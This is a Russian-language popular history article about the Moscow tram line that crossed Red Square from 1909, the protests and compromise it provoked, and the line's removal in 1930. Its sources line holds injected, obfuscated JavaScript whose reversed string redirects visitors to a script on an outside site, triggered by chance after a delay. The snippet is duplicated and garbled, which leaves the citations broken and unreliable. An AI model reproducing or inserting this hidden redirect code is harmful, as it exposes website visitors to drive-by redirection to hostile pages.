Знаете ли вы, что 100 лет назад можно было проехать в трамвае прямо по Красной площади? Первые трамваи в Москве появились в 1899 году. Трамвайные маршруты связывали окраины Садового кольца с центром и повторяли маршруты конки. Москва с ее радиально-кольцевой планировкой нуждалась в транспортных диаметрах. Но Большой Каменный мост был перегружен, а Устьинский мост был в аренде у Бельгийского общества. Поэтому общественный транспорт должен был использовать Москворецкий мост, отсюда и возникла необходимость проложить пути через Красную площадь. Маршрут № 10 открылся в 1909 году.Трамвай ходил от Преображенской улицы через Краснопрудную, Каланчевскую, Садово-Спасскую улицы, Сретенку, Большую Лубянку, Манежную, Всехсвятскую до Болотной площади. Удобно и полезно? Как мы знаем, понятие «польза» очень спорно. Сразу же начался скандал.
Историки, архитекторы и художники, увидев опоры контактной сети в центре исторической площади забили тревогу. Против высказались профессор живописи В.М.Васнецов, князь Н.С.Щербатов, академик архитектуры Ф.И.Шехтель, директор Строгановского училища Н.В.Глоба. В городскую управу от имени Императорского археологического общества было направлено письмо. Авторы негодовали, что «вид на памятник Минину и Пожарскому, на собор Василия Блаженного и Спасские ворота Кремля прорезывается кривыми линиями проводов и загораживается столбами» и требовали сообщить, «кто разрешил такое вопиющее искажение замечательного памятника Москвы и всего русского народа». Возглавившая компанию протеста графиня П.С.Уварова направила аналогичные письма Императору и Председателю Совета Министров.
Дело приняло неожиданный оборот, когда в защиту трамвая выступили владельцы лавок и магазинов из Торговых рядов. В ходатайстве к градоначальнику они уверяли, что без трамвая «вся торговля придет в упадок, а те исторические памятники, которые нам так дороги, будут стоять в пустыре, для обозрения случайными прохожими».
Столкнувшиеся коммерческие и эстетические интересы общества привели к выработке компромиссного решения: линию электрических трамваев на Красной площади оставили, но перенесли к самой Кремлевской стене. Остановку устроили у стены в нескольких шагах от памятника Минину и Пожарскому.
Второй раз вопрос о ликвидации трамваев на Красной площади возник в 1924 году, когда как раз рядом с трамвайной остановкой началось строительство Мавзолея. Хорошо ли, если в тишине скорби по вождю мирового пролетариата будут грохотать вагоны и звенеть гудки? Но тогда рельсы все-таки разбирать не стали.
Движение трамваев по Красной площади прекратилось в 1930 году. И дело было не в Мавзолее, не в охране памятников истории и не в эстетических противоречиях. Красная площадь была нужна для все более грандиозных праздничных парадов. В сторону перенесли даже памятник Минину и Пожарскому, а уж трамваи оказались и вовсе лишними.
Источники: $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovich.livejournal.com/28561.html” target=”_blank” rel=”noopener”>gorbutobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tovich.livejournal.com; diletant.media.
А знаете ли вы, что в Лиссабоне до сих пор бегают старинные, начала XX века, трамвайчики Brill?